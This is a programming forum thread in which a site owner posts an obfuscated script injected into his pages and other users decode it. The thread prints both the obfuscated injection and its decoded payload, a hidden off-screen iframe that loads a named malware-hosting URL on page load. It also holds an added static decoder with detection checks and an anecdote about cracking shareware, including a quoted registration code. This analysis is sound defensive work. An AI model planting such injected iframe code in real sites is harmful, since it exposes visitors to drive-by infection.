|
Is this anything to do with Javascript?
One of these days I'm going to think of a really clever signature.
|
|
|
|
|
Richard MacCutchan wrote: Is this anything to do with Javascript?
Yep! Looks like Pygame is made on top of GameJs (a JavaScript game engine)
Some detail here: http://gamejs.org/
Though, what OP has asked does not connect to a JavaScript question from any angle.
|
|
|
|
|
johtnkucz wrote: No module named pygame
That looks like a clear message.
One of these days I'm going to think of a really clever signature.
|
|
|
|
|
A hacker added a JavaScript to many html pages of my site. Just after the body-tag he added:
<!--<script>try{1-prototype;}catch(asd){x=2;}
if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92, 59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29, 48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,10 0,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,98 ,106,101,90,91,36,89,103,92,87,105,96,101,99,37,90,90,38,99,86,96,100,35,103,94, 101,25,49,2,1,95,91,105,99,35,96,90,21,52,22,28,93,104,98,64,90,28,50,3,-1,91,101,88,108,99,90,101,106,35,89,101,89,112,36,86,103,102,90,101,90,56,95,95, 97,91,30,94,93,104,98,32,49,2,1,115,48,4,0,108,96,100,89,102,109,35,102,100,97,1 02,87,89,23,51,21,93,104,98,56,90,89,50,3,-1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;288-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}
if(x&&f&&012===10)e(s);</script><!--
It somehow directs the browser to a site where the hacker deposited some malware for automatic download.
But I do not understand the details.
try{1-prototype;}catch(asd){x=2;} somehow sets x to 2 - but how does that happen?
v="eva";}if(v)e=window[v+"l"]; somehow creates an eval statement.
f (and then also w ) contain an encrypted statement.
In the for loop, the statement gets decrypted by s=s+fromCharCode((w[j]*1+(9+eval("j%3"))));
and finally executed by e(s); .
Since I hardly ever write JavaScript, I fail to understand the details.
I hope that you have fun with analysing that script, and that you can share some hints on its function.
|
|
|
|
|
The original JavaScript is the long array of bytes, written as numbers so it is not easy to read. The part of the code that gets executed just converts the array back to its original script text and executes it. You need to take action to protect your website from this sort of malware injection.
One of these days I'm going to think of a really clever signature.
|
|
|
|
|
With the first bit, the try statement - it's code designed to fail, so the catch block steps in and sets x = 2.
After I pasted the code, there appeared to be two commas missing from between elements in the array - either that or 2 numbers were broken in half. So I'm still not sure that I've guessed correctly.
After some mind-numbing tracing, I got to a situation where the s in the e(s) statement is equal to:
"
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999e
(9ggsk/tpd!>! iurq;-0msoed.dpfbrjpl/ec0n_jo,qin#<jdsn,je>!%gskJe%<epavncou,cpbz/_qqcoeAijje)ggsk*<~9ujobpx,poj
`c"<hqlCcc="
Which looks like junk to me, so I'll try again to paste the array correctly.
Wouldn't you just love to throttle the sod that did this..
EDIT: Had another try - I had inserted extra commas the first time round - this was clearly wrong. This time I removed the spaces, wrapped it into a function and removed the final eval, outputting instead to the console. Here's the re-written code and the final payload. Enjoy!
function injectedCrap()
{
    try{1-prototype;}catch(asd){x=2;}
    if(x)
    {
        fr="fromChar";
        f=[ 4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,
            29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,
            90,100,90,107,98,92,100,105,37,89,103,92,87,105,92, 59,
            97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,
            3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,
            94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,
            50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,
            102,50,30,35,46,48,47,90,100,29, 48,4,0,94,93,104,98,
            37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,
            90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,
            23,95,106,105,103,48,36,38,98 ,106,101,90,91,36,89,103,
            92,87,105,96,101,99,37,90,90,38,99,86,96,100,35,103,94,
            101,25,49,2,1,95,91,105,99,35,96,90,21,52,22,28,93,104,
            98,64,90,28,50,3,-1,91,101,88,108,99,90,101,106,35,89,
            101,89,112,36,86,103,102,90,101,90,56,95,95,97,91,30,94,
            93,104,98,32,49,2,1,115,48,4,0,108,96,100,89,102,109,35,
            102,100,97,102,87,89,23,51,21,93,104,98,56,90,89,50,3,-1 ];
        v="eva";
    }
    if(v)
        e=window[v+"l"];
    w=f;
    s=[];
    r=String;
    z=((e)?"Code":"");
    zx=fr+z;
    for(i=0;288-5+5-i>0;i+=1)
    {
        j=i;
        if(e)
            s=s+r[zx]((w[j]*1+(9+e("j%3"))));
    }
    console.log(s);
}
Which, when all is done and dusted evaluates to this nasty piece of work:
function frmAdd() {
    var ifrm = document.createElement('iframe');
    ifrm.style.position='absolute';
    ifrm.style.top='-999em';
    ifrm.style.left='-999em';
    ifrm.src = "http://lundf-creation.de/main.php";
    ifrm.id = 'frmId';
    document.body.appendChild(ifrm);
};
window.onload = frmAdd;
Dirty elephanters!
modified 30-Jul-12 7:59am.
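Added example, not part of the post above: the same decoding done statically in Node.js, with no call to eval and no browser, plus a check for the behaviours the thread found in the payload. The function names are this example's own; SAMPLE is the first 67 values of the array from the thread, with one number split by a space as a constructed stand-in for the paste damage described above.

```javascript
// Constructed input: first 67 values of the thread's array; "10 8" is a
// deliberately split number, like the ones the forum paste produced.
const SAMPLE = `<script>fr="fromChar";f=[4,0,91,10 8,100,88,107,95,100,101,22,91,105,99,54,91,90,
29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,
90,100,90,107,98,92,100,105,37,89,103,92,87,105,92, 59,
97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50];v="eva";</script>`;

// Return the numbers of the first "name=[...]" literal, or null if none.
function extractArray(snippet) {
  const m = /=\s*\[([-\d\s,]+)\]/.exec(snippet);
  if (!m) return null;
  // Whitespace is not significant inside the literal, so deleting it rejoins
  // numbers that a paste or mail client wrapped in the middle.
  const tokens = m[1].replace(/\s+/g, '').split(',').filter((t) => t !== '');
  return tokens.map((t, i) => {
    if (!/^-?\d+$/.test(t)) throw new Error(`token ${i} is not an integer: ${t}`);
    return Number(t);
  });
}

// The loop from the script without eval: charCode = value + 9 + (index % 3).
function decode(values) {
  return values.map((v, i) => String.fromCharCode(v + 9 + (i % 3))).join('');
}

// Flag the behaviours the thread identified in the decoded payload.
function indicators(text) {
  return {
    createsIframe: /createElement\(\s*['"]iframe['"]\s*\)/i.test(text),
    offScreen: /(top|left)\s*=\s*['"]-\d+(em|px)['"]/i.test(text),
    runsOnLoad: /window\.onload\s*=/.test(text),
    urls: text.match(/https?:\/\/[^\s"'<>]+/g) || [],
  };
}

// Decode a captured snippet as data and report on it; the payload never runs.
function analyze(snippet) {
  const values = extractArray(snippet);
  if (values === null) return null;
  const decoded = decode(values);
  return { count: values.length, decoded, ...indicators(decoded) };
}

console.log(analyze(SAMPLE));
```

Because the key depends on the index, a partial capture only decodes correctly if it starts at the beginning of the array.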
|
|
|
|
|
|
Pleasure.
Thanks for something interesting to chew on..
|
|
|
|
|
In case that the hacker comes back (I hope that won't happen...), I'll post his new creation here.
Now I understand how drive-by infections work: open a "harmless" page with the injected script, an iframe is opened outside the visible area, and from there some malware gets installed. Really nice. Fortunately my computer was found clean after a 30-hour scan with 4 virus scanners.
|
|
|
|
|
Bernhard Hiller wrote: from there some malware gets installed
Doesn't the browser ask before downloading/launching ANY file or extension? I always believed that I'm pretty safe from malware unless I click "download and run". Users get infected due to their gullibility ("scan your computer for problems and give us your credit card number by the way. And a phone number, just in case.") and lack of experience.
Right?
[edit] like this: Yu0Tube - Kareena Kapoor slapped a senior news reporter in a meeting (quite smart, spotted in a commentary on "real" YouTube, but blocking all links is a bit unrealistic)
Greetings - Jacek
|
|
|
|
|
nice job!
That's pretty crafty there, on the original Javascript, an iFrame off the browser window, hidden from view.
Your code is crafty too.
|
|
|
|
|
Thanks Jim.
I've a 20 year history of reversing code - I taught myself to program in x86 ASM during high-school by disassembling whatever programs I had to hand.
It's just a matter of experience/exposure, I guess.
|
|
|
|
|
So you must be around 48,
I took computer class in summer school of 1974 with wood shop. We had a Western Electric teletype machine, that stored our programs on yellow paper tape with rubber bands.
So we wrote programs in basic on paper, and typed them in, and ran them on a Sigma 7 Mainframe at UC Irvine.
In high school, I dropped computer class and took surf class instead, counted as a PE credit, should have stuck with it. Oh well.
Didn't pick up computers again till 1986, bought an IBM XT, but didn't know what to do with it, so I wrote programs in basic, and ran them off floppy disks. Bought a hard drive 2 years later.
I can reverse engineer a lot of things, but not code down to that level.
|
|
|
|
|
Nah, I'm just a young'n - 35, Wed next week, in fact.
Neato! Dad used to bring home punch cards for us to draw on as kids, back I suppose in about 1982 or so. We had a ball trying to imagine what all the 'dots' were that we were trying to join-up.
I think I was first exposed to Basic in about 1985 or so - A girl down the road had a ?? and I can remember vividly entering a program that would calculate your age in the year 2000 - a time that seemed a million years away. Damn - nearly as far past it now as we were before it, back then!
Isn't it funny where life takes us? I picked up programming when we were forced to occupy the computer-room at school when on detention.. I quickly swiped turbo Pascal 6 and Turbo C++ 3.1 from the network. But when a fellow nerd gave me copies of his dad's TASM, MASM and Sourcer commenting disassembler I was like a you-know-what in a you-know where! Still don't know what would have happened if I'd behaved the way I was supposed to back then..
Oh how I do envy you - we got our first piece of computerized anything in about 1990 when M&D spent about $4000 on a 386-33 complete with a whopping 40Mb HDD and 4, that's right count 'em, 4 MB of RAM.. That was an enormous purchase for m&d back then.
I was a bright but lonely kid, so was probably really lucky to have been exposed to computers at that time of my life - I still remember the stunning, overwhelming joy I felt as a 16 year old when I reverse-engineered the registration-code for UniVBE (video bios extender software) and turned shareware software into a registered version.
Heck, I still remember the reg code for Sourcer - B309868-ytht 20 years after I got it..
Now, if only I could reverse engineer people and social situations. :laughs:
Simon.
|
|
|
|
|
I started working for Xerox in 1983, and the office was filled with Xerox Word Processors, a text based system that printed to Diablo Printers. In 1985, we moved to Costa Mesa, and a new secret room was built and filled with Xerox 6065 Documenters, a tall brown tower hooked to 19" monitors, optical mouse, running Xerox Windows attached to a Xerox 2700 Laser Printer via serial cable. I was amazed at it, and started spending time learning how to use them. But all you could do was type a document, save it, and print it, and send and receive email via the internet. Yes we had internet back then.
They couldn't sell a single one starting at $40K each. At the same time, UC Irvine was one of my customers, and I started seeing all these IBM PC's popping up everywhere running WordStar, with Diablo Daisywheel printers.
So I thought to myself, I better buy one of those, they look like the future. Spent a whopping $2200 on it, with 128K of ram. My dad was a merchant marine, and thought it was a complete waste of money. Little did I know that those little beige boxes with green monitors would take off.
That's the story.
I'm sure everyone has a great story, should have taken this to the lounge.
|
|
|
|
|
haha, you beat me, today I saw it and I found the same function. well, reading this hacking code I learned few sh*t today
like you can call a function of an object as string indexed array
i.e.
console.log( String["fromCharCode"](100));
I had no idea that is allowed in js
But the fact which is still poking me. How on earth the hacker managed to inject the code to the original code in the server?
I wish I could believe there is an after life.
|
|
|
|
|
Mohibur Rashid wrote: But the fact which is still poking me. How on earth the hacker managed to inject the code to the original code in the server?
Indeed. I've often wondered about these things myself. Is it (a) a modification to the file stored on the server, or (b) an in-transit modification to the html payload (as some hotels and ISPs are known to do).
It sure is the pow(2,6) dollar question.
Make it work. Then do it better - Andrei Straut
|
|
|
|
|
please send me ajax simple program.......
|
|
|
|
|
See my answer to your other question.
One of these days I'm going to think of a really clever signature.
|
|
|
|
|
|
Try a Google search; you will find lots of information.
One of these days I'm going to think of a really clever signature.
|
|
|
|
|
|
I know that they are a rather good Dutch football team.
|
|
|
|
|
|
It's easy to crop, rotate, change colors of images. I want to use some senior image processing functions like DCT or FFT on HTML5 canvas? Are there any ready-made libs?
crop
http://www.webresourcesdepot.com/jquery-image-crop-plugin-jcrop
rotate
http://code.google.com/p/jquery-rotate/
change colors
http://github.com/mezzoblue/PaintbrushJS
dct
http://en.wikipedia.org/wiki/Discrete_cosine_transform
fft
http://en.wikipedia.org/wiki/Fft
javascript dct fft
|
|
|
|
|